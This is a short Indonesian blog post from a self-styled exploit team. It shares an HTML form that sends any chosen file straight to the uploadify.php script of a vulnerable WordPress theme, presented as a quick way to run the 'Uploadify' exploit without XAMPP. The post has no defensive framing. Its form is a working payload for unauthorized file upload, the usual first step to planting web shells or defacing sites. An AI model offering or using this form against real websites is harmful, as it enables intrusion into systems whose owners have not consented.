Script Uploadify HTML - 3xploi7 BuG

Script Uploadify HTML






Assalamualaikum Wr. Wb

Kali ini saya akan menshare script uploadify versi html. Pertama uploadify itu apa sih ? saya tau bugnya tapi gak tau pengertiannya nih.. jadi Uploadify itu sebenernya plugins jQuery yang memudahkan kamu mengupload multiple / lebih dari satu file ke website kamu dan menyelesaikan permasalahan multiple upload secara sederhana. 

Banyak yang menganggap Method "Uploadify" biasanya identik dengan xampp, katanya sih kalo pake xampp ribet pak. harus download dulu pindahin dulu ke foldernya terus buka cmd ketik command .. lama kan pak ! *iyadehh -_- * 

Nah untuk memperpendek Method tadi saya berikan script ini supaya lebih simple dan mudah. Tetapi jangan lupa juga untuk mempelajari Method uploadify yang menggunakan Xampp . 

Berikut Scriptnya :


Code:
<form
action="http://web.com/wp-content/themes/xxx/includes/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>

3xploi7 Team

0 Response to "Script Uploadify HTML"

Posting Komentar

Tempat Diskusi

Iklan Atas Artikel

3xploi7 1

seo explanation, online courses on digital marketing, internet marketing classes online

3xploi7 2

Iklan Bawah Artikel

Stay toon disini ya karena artikel akan selalu di update.
Kunjungi Terus " 3xploi7 " untuk update menarik selanjutnya, Jangan sampai Terlewatkan.

voucher'
• Join Grup Team :
 — Facebook Grup ( 4.325 Anggota )
 — Line Square